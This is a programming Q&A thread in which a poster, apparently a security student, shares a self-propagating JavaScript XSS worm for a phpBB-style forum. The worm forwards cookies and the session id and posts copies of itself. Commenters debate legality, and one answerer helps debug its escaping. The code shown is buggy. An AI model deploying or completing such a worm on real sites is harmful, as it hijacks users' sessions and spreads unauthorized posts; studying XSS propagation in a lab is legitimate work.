# Self propagating worm in javascript

Tags: javascript

I'm trying to learn more about internet security and in doing so am writing a self propagating worm (for unsanitized input). This is the script that I have so far

```
<script id=worm>
var wormstr="<script>";
wormstr.concat(document.getElemntByID("worm").innerHTML);
wormstr.concat("</scr");
wormstr.concat("ipt>");
var Ajax=null;    
Ajax=new XMLHttpRequest();
Ajax.open("POST", "http://www.xssphpbb.com/posting.php", true);
Ajax.setRequestHeader("Host","www.sxxphpbb.com");
Ajax.setRequestHeader("Connection","keep-alive");
Ajax.setRequestHeader("Cookie", document.cookie);
Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
var sid=document.cookie.match('sid=([^;]*)')[1];

var content="subject=XSS&addbbcode18=%23444444&addbbcode20=0&helpbox=Tip%3A+Styles+can+be+applied+quickly+to+selected+text.&message=";
content=content.concat(wormstr);
content=content.concat("&add_poll_option_text=&poll_length=&mode=newtopic&sid="+sid+"&f=1&post=Submit");
alert(content); //for debugging

Ajax.send(content);
</script>
```

When I run this code inside of a comment section on my server it creates a new comment but that comment is just `";content=content.concat(wormstr);content=content.concat("`

This code is suppose to create a new comment and insert itself as a script into that comment. Therefore if anyone visits the original post they will create a new identical comment. And if anyone visits one of the generated posts it will act as the original and create a new comment with this script inside it.

Comment: @zerkms, please down vote this as what the question asked  it's illegal, developers should not do evil things at any time!

Comment: Your "question" does not have any question. Neither your comments. The first step to become a security expert is to learn how to ask answerable questions.

Comment: Its not illegal I am in an internet security class and trying to learn how security works and how to write security protocols. Knowledge is not illegal

Comment: @JamesNotaro, you only got 11 rep and asked such question, so suspicious!

Comment: I'm not sure how this isn't a question. When I insert my script into a comment on my server it creates a new comment with only the last bit of code at the end in the comment. There are no miss matched quotes or missing tags, I use the correct innerHTML as far as I can tell. I am asking which part of the script I am missing because all of the documentation I have read points to this code working

Comment: It's working. The comment is posted.

Comment: What exactly does your code generate? And it's still not obvious what "issue" you have (you mentioned it but haven't explained what it is).

Comment: @KevinSimple I think you'll find that such a program is, in fact, perfectly legal. So long as OP is testing/running it only on computers whose owners have given express permission to OP to do so.

Comment: I edited the question again to explain what the purpose of the code is in better detail. And @BradSullivan this is exactly how I am using this code. As a learning exercise on my own personally run server.

Comment: @JamesNotaro yeah, that's what I thought would be the case :)

Answer (score 0):

`wormstr.concat("ipt");` appear missing closing `>` ? , causing syntax error at next line

> When I run this code inside of a comment section on my server it
>   creates a new comment but that comment is just
>   `";content=content.concat(wormstr);content=content.concat("`

Comment: I miss typed that when transferring my code over from the virtual machine it is running on. The original question has been fixed.

Comment: @JamesNotaro Issue likely syntax error , escaping characters in string. What is purpose of `"."` at `text.&message=` ?

Comment: That is just a period at the end of that sentence which is displayed by the website. The helpbox field = Tip 3A styels can be applied quickly to selected text. Tried it without the period for good measure and there was no change in behavior

Comment: Continue debugging syntax errors , perhaps add `"\"` before closing `/script` . `wormstr.concat(document.getElemntByID("worm").innerHTML);` does not escape double quotes returned by `document.getElemntByID("worm").innerHTML`

Comment: would using escape(wormstr.concat(.........).innerHTML); take care of this issue.

Comment: Not certain ? Test if  `wormstr` is valid string , `html` outside of being called with `js` at Question . Could also substitute composing string line by line for calling `.innerHTML`